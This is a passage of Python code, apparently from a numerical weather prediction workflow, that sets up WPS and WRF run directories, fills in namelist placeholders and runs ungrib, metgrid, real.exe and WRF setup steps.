#If the data does not exist then download it and extract it to where it belongs.
else:
logging.warning('_run_WPS the user has not setup static terrestrial input data.')
self._download_geog_data(self.directory_root_geog, self.directory_root_input)
#Create the run directory for WPS and all of its sub-directories
os.makedirs(directory_WPS_run+'/geogrid/src')
os.makedirs(directory_WPS_run+'/metgrid/src')
os.makedirs(directory_WPS_run+'/ungrib/src')
os.makedirs(directory_WPS_run+'/ungrib/Variable_Tables')
#Create links to the geogrid executable and table
util.link_to(self.directory_WPS_input+'/geogrid/src/geogrid.exe', directory_WPS_run+'/geogrid/src/geogrid.exe')
util.link_to(self.directory_WPS_input+'/geogrid/GEOGRID.TBL.ARW', directory_WPS_run+'/geogrid/GEOGRID.TBL')
#Create links to the metgrid executable and table
util.link_to(self.directory_WPS_input+'/metgrid/src/metgrid.exe', directory_WPS_run+'/metgrid/src/metgrid.exe')
util.link_to(self.directory_WPS_input+'/metgrid/METGRID.TBL.ARW', directory_WPS_run+'/metgrid/METGRID.TBL')
#Create links to the ungrib executable and the variable tables
util.link_to(self.directory_WPS_input+'/ungrib/src/ungrib.exe',
directory_WPS_run+'/ungrib/src/ungrib.exe')
util.link_to(self.directory_WPS_input+'/ungrib/Variable_Tables/Vtable.SST',
directory_WPS_run+'/ungrib/Variable_Tables/Vtable.SSTNCEP')
util.link_to(self.directory_WPS_input+'/ungrib/Variable_Tables/Vtable.SST',
directory_WPS_run+'/ungrib/Variable_Tables/Vtable.SSTOI')
util.link_to(self.directory_WPS_input+'/ungrib/Variable_Tables/Vtable.SST',
directory_WPS_run+'/ungrib/Variable_Tables/Vtable.SSTJPL')
util.link_to(self.directory_WPS_input+'/ungrib/Variable_Tables/Vtable.SST',
directory_WPS_run+'/ungrib/Variable_Tables/Vtable.SSTSPORT')
util.link_to(self.directory_WPS_input+'/ungrib/Variable_Tables/Vtable.SST',
directory_WPS_run+'/ungrib/Variable_Tables/Vtable.SSTMUR')
util.link_to(self.directory_WPS_input+'/ungrib/Variable_Tables/Vtable.ECMWF_sigma',
directory_WPS_run+'/ungrib/Variable_Tables/Vtable.ECMWF_sigma')
util.link_to(self.directory_WPS_input+'/ungrib/Variable_Tables/Vtable.RAP.hybrid.ncep',
directory_WPS_run+'/ungrib/Variable_Tables/Vtable.RAP')
util.link_to(self.directory_WPS_input+'/ungrib/Variable_Tables/Vtable.RAP_noLSM',
directory_WPS_run+'/ungrib/Variable_Tables/Vtable.RAP_noLSM')
util.link_to(self.directory_WPS_input+'/ungrib/Variable_Tables/Vtable.NAM',
directory_WPS_run+'/ungrib/Variable_Tables/Vtable.NAM')
util.link_to(self.directory_WPS_input+'/ungrib/Variable_Tables/Vtable.LIS',
directory_WPS_run+'/ungrib/Variable_Tables/Vtable.NASALISCONUS')
util.link_to(self.directory_WPS_input+'/ungrib/Variable_Tables/Vtable.ERA-interim.ml',
directory_WPS_run+'/ungrib/Variable_Tables/Vtable.ERAISFC')
util.link_to(self.directory_WPS_input+'/ungrib/Variable_Tables/Vtable.GFSNEW',
directory_WPS_run+'/ungrib/Variable_Tables/Vtable.GFSNEW')
util.link_to(self.directory_WPS_input+'/ungrib/Variable_Tables/Vtable.GFSNEW',
directory_WPS_run+'/ungrib/Variable_Tables/Vtable.GFSsubset')
util.link_to(self.directory_WPS_input+'/ungrib/Variable_Tables/Vtable.GFSRDA',
directory_WPS_run+'/ungrib/Variable_Tables/Vtable.GFSRDA')
util.link_to(self.directory_WPS_input+'/ungrib/Variable_Tables/Vtable.CFSR2_web',
directory_WPS_run+'/ungrib/Variable_Tables/Vtable.CFSR')
#ERAI - Vtable (model levels used). Note: this will not work if grib files contain pressure level data
if self.inputDataSets.get('ERAI') is not None:
util.link_to(self.directory_WPS_input+'/ungrib/Variable_Tables/Vtable.ERA-interim.ml',
directory_WPS_run+'/ungrib/Variable_Tables/Vtable.ERAI')
#GFS was upgraded on 15 January 2015: for forecasts starting on or before that date use the old GFS Vtable, otherwise use the upgraded (GFSNEW) Vtable
if self.datetimeStartUTC <= datetime(2015, 1, 15, tzinfo=pytz.utc):
util.link_to(self.directory_WPS_input+'/ungrib/Variable_Tables/Vtable.GFS',
directory_WPS_run+'/ungrib/Variable_Tables/Vtable.GFS')
util.link_to(self.directory_WPS_input+'/ungrib/Variable_Tables/Vtable.GFS',
directory_WPS_run+'/ungrib/Variable_Tables/Vtable.FNL')
else:
util.link_to(self.directory_WPS_input+'/ungrib/Variable_Tables/Vtable.GFSNEW',
directory_WPS_run+'/ungrib/Variable_Tables/Vtable.GFS')
util.link_to(self.directory_WPS_input+'/ungrib/Variable_Tables/Vtable.GFSNEW',
directory_WPS_run+'/ungrib/Variable_Tables/Vtable.FNL')
#Run the linking script of WPS
util.link_to(self.directory_WPS_input+'/link_grib.csh', directory_WPS_run+'/link_grib.csh')
#Copy the template for the WPS namelist from the WPS input directory to the WPS run directory
shutil.copy(self.directory_IBM_input+'/namelist.wps', directory_WPS_run+'/namelist.wps')
#Change to the WPS run directory
os.chdir(directory_WPS_run)
#Link the executables to the current directory
util.link_to('ungrib/src/ungrib.exe', directory_WPS_run+'/ungrib.exe')
util.link_to('geogrid/src/geogrid.exe', directory_WPS_run+'/geogrid.exe')
util.link_to('metgrid/src/metgrid.exe', directory_WPS_run+'/metgrid.exe')
#Replace the place-holders in the WPS namelist file with the properties of this DeepThunder object
util.replace_string_in_file('namelist.wps', 'DT_START_DATE_TIME_DT', str(self.datetimeStartUTC.year)+'-'+str(self.datetimeStartUTC.month).zfill(2)+'-'+str(self.datetimeStartUTC.day).zfill(2)+'_'+str(self.datetimeStartUTC.hour).zfill(2)+':00:00')
util.replace_string_in_file('namelist.wps', 'DT_END_DATE_TIME_DT', str(datetimeEndUTC.year)+'-'+str(datetimeEndUTC.month).zfill(2)+'-'+str(datetimeEndUTC.day).zfill(2)+'_'+str(datetimeEndUTC.hour).zfill(2)+':00:00')
#Set all the location variables in namelist.wps
self._replace_location_strings('namelist.wps')
#Track which input datasets have already been ungribbed
dictUngrib = []
#For each input dataset label
for ids in self.inputDataSets.iterkeys():
idso = self.inputDataSets[ids]
#Call the prepare function of objects of class InputDataSet
if idso.ungrib:
idso.prepare(pre_processing_input_dir=self.directory_PreProcessing_input, lon_min=self.lon_min, lon_max=self.lon_max, lat_min=self.lat_min, lat_max=self.lat_max)
if idso.ungrib:
#Run the ungrib function
if idso.name not in dictUngrib:
logging.info('_run_WPS Ungrib '+ str(idso.name))
self._ungrib(idso.type, directory_WPS_run, idso.ungrib_prefix, datetimeEndUTC)
dictUngrib.append(idso.name)
else:
logging.info('ids '+str(idso.name)+'requests ungrib skipped')
else:
logging.info('ids '+str(idso.name)+'is for verification only prepare() will not be run for this dataset')
#If ERAI compute pressure on Model levels for real.exe
if self.inputDataSets.get('ERAI') is not None:
#Setup
util.link_to(self.directory_WPS_input+'_IBM/util/ecmwf_coeffs', directory_WPS_run+'/ecmwf_coeffs') #ecmwf_coeffs
util.link_to(self.directory_WPS_input+'/util/src/calc_ecmwf_p.exe', directory_WPS_run+'/calc_ecmwf_p.exe') #calc_ecmwf_p.exe
fg_name = [] #'ERAI','PRES'
fg_name.append('ERAI')
fg_name.append('PRES')
util.replace_string_in_file('namelist.wps', ' fg_name = \'FILE\',', ' fg_name = \''+'\', \''.join(fg_name)+'\',')
#Run calc_ecmwf_p.exe
process = subprocess.Popen([directory_WPS_run+'/calc_ecmwf_p.exe'])
process.wait()
#Change to the WPS run directory
os.chdir(directory_WPS_run)
#Copy the namelist template again to get a clean version
shutil.copy(self.directory_IBM_input+'/namelist.wps', directory_WPS_run+'/namelist.wps')
#Replace the place-holders in the WPS namelist file with the properties of this DeepThunder object
util.replace_string_in_file('namelist.wps', 'DT_START_DATE_TIME_DT', str(self.datetimeStartUTC.year)+'-'+str(self.datetimeStartUTC.month).zfill(2)+'-'+str(self.datetimeStartUTC.day).zfill(2)+'_'+str(self.datetimeStartUTC.hour).zfill(2)+':00:00')
util.replace_string_in_file('namelist.wps', 'DT_END_DATE_TIME_DT', str(datetimeEndUTC.year)+'-'+str(datetimeEndUTC.month).zfill(2)+'-'+str(datetimeEndUTC.day).zfill(2)+'_'+str(datetimeEndUTC.hour).zfill(2)+':00:00')
self._replace_location_strings('namelist.wps')
#Before running geogrid make a picture of the domain.
logging.info('Making an image of the domains with plotgrids.ncl')
util.link_to(self.directory_WPS_input+'/util/plotgrids_new.ncl', directory_WPS_run+'/plotgrids_new.ncl')
util.replace_string_in_file('plotgrids_new.ncl', 'x11', 'pdf')
process = subprocess.Popen(['ncl', directory_WPS_run+'/plotgrids_new.ncl'])
process.wait()
#Log information to DeepThunder log-file
logging.info('WPS: run geogrid.exe')
#Run geogrid.exe
process = subprocess.Popen([directory_WPS_run+'/geogrid.exe'])
process.wait()
if self.inputDataSets.get('ECMWF') is not None:
os.remove(directory_WPS_run+'/metgrid/METGRID.TBL')
shutil.copy(self.directory_WPS_input+'/metgrid/METGRID.TBL.ARW', directory_WPS_run+'/metgrid/METGRID.TBL')
util.replace_string_in_file(directory_WPS_run+'/metgrid/METGRID.TBL', 'name=TT\n mandatory=yes # MUST HAVE THIS FIELD', 'name=TT\n mandatory=yes # MUST HAVE THIS FIELD\n derived=yes')
util.replace_string_in_file(directory_WPS_run+'/metgrid/METGRID.TBL', 'name=UU\n mandatory=yes # MUST HAVE THIS FIELD', 'name=UU\n mandatory=yes # MUST HAVE THIS FIELD\n derived=yes')
util.replace_string_in_file(directory_WPS_run+'/metgrid/METGRID.TBL', 'name=VV\n mandatory=yes # MUST HAVE THIS FIELD', 'name=VV\n mandatory=yes # MUST HAVE THIS FIELD\n derived=yes')
#Log information to DeepThunder log-file
logging.info('WPS: run metgrid.exe')
#For each input dataset label
fg_name = []
constant = False
for ids, idso in dsUngrib.iteritems():
if idso.ungrib_prefix is not None:
if idso.ungrib_prefix not in fg_name and not idso.is_sst:
if idso.type in self.initialConditions or idso.type in self.boundaryConditions:
fg_name.append(idso.ungrib_prefix)
logging.info('WPS run metgrid.exe chosen to include ' +str(idso.type))
else:
logging.info('WPS: run metgrid.exe chosen not to run metgrid with '+ str(idso.type))
elif idso.is_sst and not constant and not self.is_analysis:
constant_idso = idso
#make sure the date is the same as the date used for ungrib.
constant_idso_date = constant_idso.date
try:
constant_idso_date = constant_idso.get_sst_date()
except:
logging.error('ERROR: malformed InputDataSet '+ str(idso.type))
constant = True
logging.info('WPS run metgrid.exe chosen to include ' +str(idso.type) + ' as a constant')
util.replace_string_in_file('namelist.wps', '&metgrid\n', '&metgrid\n constants_name = \''+constant_idso.ungrib_prefix+':'+str(constant_idso_date.year)+'-'+str(constant_idso_date.month).zfill(2)+'-'+str(constant_idso_date.day).zfill(2)+'_'+str(constant_idso_date.hour).zfill(2)+'\'\n') # constants_name = './SST:2015-03-26_00'
elif idso.is_sst and self.is_analysis and idso.ungrib_prefix not in fg_name:
#ungrib the SST.
fg_name.append(idso.ungrib_prefix)
self.sstintervalseconds = idso.intervalseconds
logging.info('WPS run metgrid.exe chosen to include ' +str(idso.type) + ' as a SST')
#ERAI - add pressure files
if self.inputDataSets.get('ERAI') is not None:
fg_name.append('PRES') #'ERAI','PRES'. That is TWO strings is all we need.
logging.debug('fg_name is '+str(fg_name))
util.replace_string_in_file('namelist.wps', ' fg_name = \'FILE\',', ' fg_name = \''+'\', \''.join(fg_name)+'\',')
#Run metgrid.exe
logging.info('_run_WPS: metgrid.exe called...')
process = subprocess.Popen([directory_WPS_run+'/metgrid.exe'])
process.wait()
def _ungrib(self, dataType, directory_WPS_run, ungribPrefix, datetimeEndUTC):
"""
Prepares the namelist.wps file for ungrib.exe and then runs ungrib.exe
"""
logging.info('_ungrib: ungrib called for '+ str(ungribPrefix)+' dataType is '+str(dataType))
os.chdir(directory_WPS_run)
#If the namelist already exists in destination remove it
if os.path.isfile(directory_WPS_run+'/namelist.wps'):
os.remove(directory_WPS_run+'/namelist.wps')
#Copy over a fresh namelist template
shutil.copy(self.directory_IBM_input+'/namelist.wps', directory_WPS_run+'/namelist.wps')
#Ungribbing an SST dataset needs care because the interval time must match that of the other datasets, e.g. 6 hours.
#namelist.wps stores DT_INTERVAL_SECONDS which should already be set.
if dataType.startswith('SST') and not self.is_analysis:
logging.debug('_ungrib: using sstdate ' + str(self.datetimeSST))
util.replace_string_in_file('namelist.wps', 'DT_START_DATE_TIME_DT', str(self.datetimeSST.year)+'-'+str(self.datetimeSST.month).zfill(2)+'-'+str(self.datetimeSST.day).zfill(2)+'_'+str(self.datetimeSST.hour).zfill(2)+':00:00')
else:
util.replace_string_in_file('namelist.wps', 'DT_START_DATE_TIME_DT', str(self.datetimeStartUTC.year)+'-'+str(self.datetimeStartUTC.month).zfill(2)+'-'+str(self.datetimeStartUTC.day).zfill(2)+'_'+str(self.datetimeStartUTC.hour).zfill(2)+':00:00')
util.replace_string_in_file('namelist.wps', 'DT_END_DATE_TIME_DT', str(datetimeEndUTC.year)+'-'+str(datetimeEndUTC.month).zfill(2)+'-'+str(datetimeEndUTC.day).zfill(2)+'_'+str(datetimeEndUTC.hour).zfill(2)+':00:00')
util.replace_string_in_file('namelist.wps', ' prefix = \'DT_UNGRIB_PREFIX_DT\'', ' prefix = \''+ungribPrefix+'\'')
logging.info('_ungrib: ungrib replacing prefix with ' + str(ungribPrefix))
self._replace_location_strings('namelist.wps')
#Link the corresponding Variable table
logging.debug('_ungrib: link in Vtable assigning Vtable.dataType for '+str(dataType)+' to Vtable.'+str(ungribPrefix))
#If Vtable already exists remove it. link_to does not overwrite.
if os.path.isfile('Vtable'):
os.remove('Vtable')
util.link_to('ungrib/Variable_Tables/Vtable.'+str(ungribPrefix), 'Vtable')
#Run linking script
listOfFileNames = self._get_list_of_inputdatasets(dataType)
logging.debug('_ungrib: list of files to link based on dataType '+str(dataType)+' is '+str(listOfFileNames))
listOfFileNames = list(set(listOfFileNames)) # ERAI - Unique grib filenames only.
logging.info('_ungrib: running link_grib.csh')
#NOTE we do not sort filenames for erai : UA first, SFC next.
logging.info('Run link_grib.csh for ' + ', '.join(listOfFileNames))
process = subprocess.Popen(['csh', 'link_grib.csh']+listOfFileNames)
process.wait()
#Log information to DeepThunder log-file
logging.info('_ungrib: run ungrib.exe for '+dataType)
#Setup a log file for ungrib.exe
ungrib_log = open(str(directory_WPS_run)+'/IBM-CFW-ungrib.log', 'a')
#Run ungrib.exe
process = subprocess.Popen([directory_WPS_run+'/ungrib.exe'], stdout=ungrib_log, stderr=ungrib_log)
process.wait()
def _get_list_of_inputdatasets(self, dataType):
"""
Creates a list of all input data set file paths and names
"""
listOfFileNames = []
for idso in self.inputfiles:
if idso.type == dataType:
if dataType == 'ERAI':
listOfFileNames.append(idso.name_prepared.strip()) # We already have absolute paths. Strip trailing spaces now.
else:
listOfFileNames.append(idso.path+'/'+idso.name_prepared) # Prefix data dir path to filenames (other than ERAI).
return listOfFileNames
def _run_Real(self, directory_Real_run, directory_WPS_run, ids, datetimeEndUTC):
"""
Prepares and executes real.exe.
ids = the boundary-conditions dataset(s); only one dataset is accepted. The values for
metgrid_levels and metgrid_soil_levels are read from the first metgrid file found below.
"""
logging.info('_run_Real. real called : '+ str(directory_Real_run) +' : '+ str(directory_WPS_run))
#Create the run directory for real.exe
os.makedirs(directory_Real_run)
shutil.copy(self.directory_IBM_input+'/namelist.input', directory_Real_run+'/namelist.input')
util.link_to(self.directory_WRF_input+'/real.exe', directory_Real_run+'/real.exe')
util.link_to(self.directory_WRF_input+'/wrf.exe', directory_Real_run+'/wrf.exe')
util.link_to(self.directory_WRF_input+'/aerosol.formatted', directory_Real_run+'/aerosol.formatted')
util.link_to(self.directory_WRF_input+'/aerosol_lat.formatted', directory_Real_run+'/aerosol_lat.formatted')
util.link_to(self.directory_WRF_input+'/aerosol_lon.formatted', directory_Real_run+'/aerosol_lon.formatted')
util.link_to(self.directory_WRF_input+'/aerosol_plev.formatted', directory_Real_run+'/aerosol_plev.formatted')
util.link_to(self.directory_WRF_input+'/CAM_ABS_DATA', directory_Real_run+'/CAM_ABS_DATA')
util.link_to(self.directory_WRF_input+'/CAM_AEROPT_DATA', directory_Real_run+'/CAM_AEROPT_DATA')
util.link_to(self.directory_WRF_input+'/CAMtr_volume_mixing_ratio.A1B', directory_Real_run+'/CAMtr_volume_mixing_ratio.A1B')
util.link_to(self.directory_WRF_input+'/CAMtr_volume_mixing_ratio.A2', directory_Real_run+'/CAMtr_volume_mixing_ratio.A2')
util.link_to(self.directory_WRF_input+'/CAMtr_volume_mixing_ratio.RCP4.5', directory_Real_run+'/CAMtr_volume_mixing_ratio.RCP4.5')
util.link_to(self.directory_WRF_input+'/CAMtr_volume_mixing_ratio.RCP6', directory_Real_run+'/CAMtr_volume_mixing_ratio.RCP6')
util.link_to(self.directory_WRF_input+'/CAMtr_volume_mixing_ratio.RCP8.5', directory_Real_run+'/CAMtr_volume_mixing_ratio.RCP8.5')
util.link_to(self.directory_WRF_input+'/CLM_ALB_ICE_DFS_DATA', directory_Real_run+'/CLM_ALB_ICE_DFS_DATA')
util.link_to(self.directory_WRF_input+'/CLM_ALB_ICE_DRC_DATA', directory_Real_run+'/CLM_ALB_ICE_DRC_DATA')
util.link_to(self.directory_WRF_input+'/CLM_ASM_ICE_DFS_DATA', directory_Real_run+'/CLM_ASM_ICE_DFS_DATA')
util.link_to(self.directory_WRF_input+'/CLM_ASM_ICE_DRC_DATA', directory_Real_run+'/CLM_ASM_ICE_DRC_DATA')
util.link_to(self.directory_WRF_input+'/CLM_DRDSDT0_DATA', directory_Real_run+'/CLM_DRDSDT0_DATA')
util.link_to(self.directory_WRF_input+'/CLM_EXT_ICE_DFS_DATA', directory_Real_run+'/CLM_EXT_ICE_DFS_DATA')
util.link_to(self.directory_WRF_input+'/CLM_EXT_ICE_DRC_DATA', directory_Real_run+'/CLM_EXT_ICE_DRC_DATA')
util.link_to(self.directory_WRF_input+'/CLM_KAPPA_DATA', directory_Real_run+'/CLM_KAPPA_DATA')
util.link_to(self.directory_WRF_input+'/CLM_TAU_DATA', directory_Real_run+'/CLM_TAU_DATA')
util.link_to(self.directory_WRF_input+'/co2_trans', directory_Real_run+'/co2_trans')
util.link_to(self.directory_WRF_input+'/ETAMPNEW_DATA', directory_Real_run+'/ETAMPNEW_DATA')
util.link_to(self.directory_WRF_input+'/ETAMPNEW_DATA_DBL', directory_Real_run+'/ETAMPNEW_DATA_DBL')
util.link_to(self.directory_WRF_input+'/ETAMPNEW_DATA.expanded_rain', directory_Real_run+'/ETAMPNEW_DATA.expanded_rain')
util.link_to(self.directory_WRF_input+'/ETAMPNEW_DATA.expanded_rain_DBL', directory_Real_run+'/ETAMPNEW_DATA.expanded_rain_DBL')
util.link_to(self.directory_WRF_input+'/GENPARM.TBL', directory_Real_run+'/GENPARM.TBL')
util.link_to(self.directory_WRF_input+'/grib2map.tbl', directory_Real_run+'/grib2map.tbl')
util.link_to(self.directory_WRF_input+'/gribmap.txt', directory_Real_run+'/gribmap.txt')
util.link_to(self.directory_WRF_input+'/LANDUSE.TBL', directory_Real_run+'/LANDUSE.TBL')
util.link_to(self.directory_WRF_input+'/MPTABLE.TBL', directory_Real_run+'/MPTABLE.TBL')
util.link_to(self.directory_WRF_input+'/ndown.exe', directory_Real_run+'/ndown.exe')
#Note: the WRF 3.8.1 build script has nup.exe commented out with the phrase "#TEMPORARILY REMOVED"
util.link_to(self.directory_WRF_input+'/nup.exe', directory_Real_run+'/nup.exe')
util.link_to(self.directory_WRF_input+'/ozone.formatted', directory_Real_run+'/ozone.formatted')
util.link_to(self.directory_WRF_input+'/ozone_lat.formatted', directory_Real_run+'/ozone_lat.formatted')
util.link_to(self.directory_WRF_input+'/ozone_plev.formatted', directory_Real_run+'/ozone_plev.formatted')
util.link_to(self.directory_WRF_input+'/RRTM_DATA', directory_Real_run+'/RRTM_DATA')
util.link_to(self.directory_WRF_input+'/RRTM_DATA_DBL', directory_Real_run+'/RRTM_DATA_DBL')
util.link_to(self.directory_WRF_input+'/RRTMG_LW_DATA', directory_Real_run+'/RRTMG_LW_DATA')
util.link_to(self.directory_WRF_input+'/RRTMG_LW_DATA_DBL', directory_Real_run+'/RRTMG_LW_DATA_DBL')
util.link_to(self.directory_WRF_input+'/RRTMG_SW_DATA', directory_Real_run+'/RRTMG_SW_DATA')
util.link_to(self.directory_WRF_input+'/RRTMG_SW_DATA_DBL', directory_Real_run+'/RRTMG_SW_DATA_DBL')
util.link_to(self.directory_WRF_input+'/SOILPARM.TBL', directory_Real_run+'/SOILPARM.TBL')
util.link_to(self.directory_WRF_input+'/tc.exe', directory_Real_run+'/tc.exe')
util.link_to(self.directory_WRF_input+'/tr49t67', directory_Real_run+'/tr49t67')
util.link_to(self.directory_WRF_input+'/tr49t85', directory_Real_run+'/tr49t85')
util.link_to(self.directory_WRF_input+'/tr67t85', directory_Real_run+'/tr67t85')
util.link_to(self.directory_WRF_input+'/URBPARM.TBL', directory_Real_run+'/URBPARM.TBL')
util.link_to(self.directory_WRF_input+'/URBPARM_UZE.TBL', directory_Real_run+'/URBPARM_UZE.TBL')
util.link_to(self.directory_WRF_input+'/VEGPARM.TBL', directory_Real_run+'/VEGPARM.TBL')
os.chdir(directory_Real_run)
#The name of the first found metgrid file.
firstMetgridFile = None
#Create links to the met_em*-files
for file_name in os.listdir(directory_WPS_run):
if 'met_em.' in file_name:
util.link_to(directory_WPS_run+'/'+file_name, directory_Real_run+'/'+file_name)
#Record the name of the first found metgrid file.
if firstMetgridFile is None:
firstMetgridFile = directory_WPS_run+'/'+file_name
#Replace place-holders in input file namelist.input
util.replace_string_in_file('namelist.input', 'DT_RUN_DAYS_DT', '00')
#For real.exe: run hours = max(forecast length, WPS run length based on input file frequency)
if self.forecastLength < self.runlength_wps: # Based on grib input file frequency
util.replace_string_in_file('namelist.input', 'DT_RUN_HOURS_DT', str(self.runlength_wps).zfill(2))
else:
util.replace_string_in_file('namelist.input', 'DT_RUN_HOURS_DT', str(self.forecastLength-self.runshort).zfill(2))
util.replace_string_in_file('namelist.input', 'DT_RUN_MINUTES_DT', '00')
util.replace_string_in_file('namelist.input', 'DT_RUN_SECONDS_DT', '00')
util.replace_string_in_file('namelist.input', 'DT_START_YEAR_DT', str(self.datetimeStartUTC.year))
util.replace_string_in_file('namelist.input', 'DT_START_MONTH_DT', str(self.datetimeStartUTC.month).zfill(2))
util.replace_string_in_file('namelist.input', 'DT_START_DAY_DT', str(self.datetimeStartUTC.day).zfill(2))
util.replace_string_in_file('namelist.input', 'DT_START_HOUR_DT', str(self.datetimeStartUTC.hour).zfill(2))
util.replace_string_in_file('namelist.input', 'DT_START_MINUTES_DT', '00')
util.replace_string_in_file('namelist.input', 'DT_START_SECONDS_DT', '00')
util.replace_string_in_file('namelist.input', 'DT_END_YEAR_DT', str(datetimeEndUTC.year))
util.replace_string_in_file('namelist.input', 'DT_END_MONTH_DT', str(datetimeEndUTC.month).zfill(2))
util.replace_string_in_file('namelist.input', 'DT_END_DAY_DT', str(datetimeEndUTC.day).zfill(2))
util.replace_string_in_file('namelist.input', 'DT_END_HOUR_DT', str(datetimeEndUTC.hour).zfill(2))
util.replace_string_in_file('namelist.input', 'DT_END_MINUTES_DT', '00')
util.replace_string_in_file('namelist.input', 'DT_END_SECONDS_DT', '00')
util.replace_string_in_file('namelist.input', 'DT_MAX_DOM_DT', str(max(self.domains)))
util.replace_string_in_file('namelist.input', 'DT_INTERVAL_SECONDS', str(self.WPSintervalseconds))
for dom in range(len(self.domain_dims_dx)):
util.replace_string_in_file('namelist.input', 'DT_DX_'+str(dom+1)+'_DT', str(self.domain_dims_dx[dom]))
util.replace_string_in_file('namelist.input', 'DT_DY_'+str(dom+1)+'_DT', str(self.domain_dims_dy[dom]))
#history_interval
util.replace_string_in_file('namelist.input', 'DT_HIST_'+str(dom+1)+'_DT', str(self.domain_history_interval[dom]))
for dom in range(len(self.domain_dims_dx), self.MAXINSTRUMENTEDDOMAINS+1):
util.replace_string_in_file('namelist.input', 'DT_DX_'+str(dom+1)+'_DT', str(1))
util.replace_string_in_file('namelist.input', 'DT_DY_'+str(dom+1)+'_DT', str(1))
#history_interval
util.replace_string_in_file('namelist.input', 'DT_HIST_'+str(dom+1)+'_DT', str(self.DEFAULT_HIST_INT))
util.replace_string_in_file('namelist.input', 'DT_PARENT_GRID_RATIO_DT', str(self.parent_grid_ratio))
#Set default metgrid levels based on those from GFS. These will be overwritten if a metgrid file is found.
DT_NUM_METGRID_LEVELS_DT = '27'
DT_NUM_METGRID_SOIL_LEVELS_DT = '4'
#If we have found at least one metgrid file then:
if firstMetgridFile is not None:
#Set DT_NUM_METGRID_LEVELS_DT and DT_NUM_METGRID_SOIL_LEVELS_DT based on those found in the metgrid file.
DT_NUM_METGRID_LEVELS_DT = str(self._get_num_metgrid_levels(firstMetgridFile))
DT_NUM_METGRID_SOIL_LEVELS_DT = str(self._get_num_metgrid_soil_levels(firstMetgridFile))
logging.debug('_run_Real setting metgrid levels and soil levels to '+ str(DT_NUM_METGRID_LEVELS_DT)+' '+ str(DT_NUM_METGRID_SOIL_LEVELS_DT))
else:
logging.error('_run_Real NO metgrid files found. This will be fatal')
#Replace place-holders in input file namelist.input for the number of levels
util.replace_string_in_file('namelist.input', 'DT_NUM_METGRID_LEVELS_DT', DT_NUM_METGRID_LEVELS_DT)
util.replace_string_in_file('namelist.input', 'DT_NUM_METGRID_SOIL_LEVELS_DT', DT_NUM_METGRID_SOIL_LEVELS_DT)
util.replace_string_in_file('namelist.input', 'DT_TIME_STEP_DT', str(self.timeStepForecast))
util.replace_string_in_file('namelist.input', 'DT_VERT_COUNT_DT', str(self.num_vertical_levels))
#PHYSICS options start
util.replace_string_in_file('namelist.input', 'DT_MPPH', str(self.phys_mp_val))
util.replace_string_in_file('namelist.input', 'DT_RALWPH', str(self.phys_ralw_val))
util.replace_string_in_file('namelist.input', 'DT_RASWPH', str(self.phys_rasw_val))
util.replace_string_in_file('namelist.input', 'DT_SFC', str(self.phys_sfcc_val))
util.replace_string_in_file('namelist.input', 'DT_SUR', str(self.phys_sfc_val))
util.replace_string_in_file('namelist.input', 'DT_PBLPH', str(self.phys_pbl_val))
for i in self.domains:
custr = 'DT_CUPH' +str(i)
util.replace_string_in_file('namelist.input', custr, str(self.phys_cu_val[i-1]))
for i in self.idomains:
if i > max(self.domains):
custr = 'DT_CUPH' +str(i)
util.replace_string_in_file('namelist.input', custr, str(0))
util.replace_string_in_file('namelist.input', 'DT_URB', str(self.phys_urb_val))
#PHYSICS options end
self._replace_location_strings('namelist.input')
#Disable or enable auxhist2 and auxhist7
if self.auxhist7:
#Enable in hours
util.replace_string_in_file('namelist.input', 'DT_AUX7', str(1))
else:
#Set to zero to disable.
util.replace_string_in_file('namelist.input', 'DT_AUX7', str(0))
if self.auxhist2:
#Enable (in minutes)
util.replace_string_in_file('namelist.input', 'DT_AUX2', str(60))
else:
#Disable
util.replace_string_in_file('namelist.input', 'DT_AUX2', str(0))
#Disable or enable feedback
if self.feedback:
#If feedback is on set to 1
util.replace_string_in_file('namelist.input', 'DT_FEEDBACK', str(1))
else:
#Otherwise set to 0
util.replace_string_in_file('namelist.input', 'DT_FEEDBACK', str(0))
#Disable or enable adaptive time steps
if self.adaptivets:
#If adaptive time stepping is on set to .true.
util.replace_string_in_file('namelist.input', 'DT_ADTS', '.true.')
else:
#Otherwise set to .false.
util.replace_string_in_file('namelist.input', 'DT_ADTS', '.false.')
#Setup SST_UPDATE
#Two flags need changing: auxinput4_interval to the minutes between updates, and sst_update to 1.
#For SST updates to work, the aux input 4 settings io_form_auxinput4 and auxinput4_inname must also be set.
DT_AUX4_INT_DT = (self.sstintervalseconds/60)
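#Example: a 6-hourly SST dataset (sstintervalseconds = 21600) gives auxinput4_interval = 360 minutes;
#with no SST dataset this stays at 0.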
#If the reanalysis flag is on turn SST updates on.
if self.is_analysis:
DT_SST_UPDATE_DT = 1
else:
DT_SST_UPDATE_DT = 0
util.replace_string_in_file('namelist.input', 'DT_AUX4_INT_DT', str(DT_AUX4_INT_DT))
util.replace_string_in_file('namelist.input', 'DT_SST_UPDATE_DT', str(DT_SST_UPDATE_DT))
#No obsnudging in Stevedore (this will change in the future)
DT_AUX11 = 0
DT_AUXEH11 = 0
util.replace_string_in_file('namelist.input', 'DT_AUX11', str(DT_AUX11))
util.replace_string_in_file('namelist.input', 'DT_AUXEH11', str(DT_AUXEH11))
# Run real.exe with mpirun using self.numberCores processes
try:
process = subprocess.Popen(['mpirun', '-np', str(self.numberCores), './real.exe'])
process.wait()
except OSError as os_err:
logging.error('real.exe failed to run. Please check that mpirun is in your path.')
logging.error(' error is '+ str(os_err.strerror))
#Log information to log-file
logging.info('real.exe log-file')
#Copy real.exe log into general stevedore log-file
reallog = open(directory_Real_run+'/rsl.error.0000').read()
logging.info(reallog)
#run_hours for WRF set to forecast length here
util.replace_string_in_file('namelist.input', 'DT_RUN_HOURS_DT', str(self.forecastLength))
def run_WRF(self):
"""
Runs WRF. After copying the required files it runs real.exe and then starts wrf.exe.
"""
#Log information to DeepThunder log-file
logging.info('Run WRF ...')
if self.norunwrf:
#No need to create directories; we are not running wrf.
logging.info('No need to create directories for wrf output, we are not running wrf')
else:
# Create directories for wrf output
if os.path.exists(self.directory_wrf_run):
logging.info('run_WRF: Moving old wrf run to wrf_old ...')
if os.path.exists(self.directory_wrf_run+'_old'):
logging.info('run_WRF: removing old wrf_old directory ...')
shutil.rmtree(self.directory_wrf_run+'_old')
shutil.move(self.directory_wrf_run, self.directory_wrf_run+'_old')
if not self.norunwrf:
shutil.copytree(self.directory_PreProcessing_run+'/Real_boundary', self.directory_wrf_run)
if os.path.exists(self.directory_PreProcessing_run+'/Real_initial'):
for domain in self.domains:
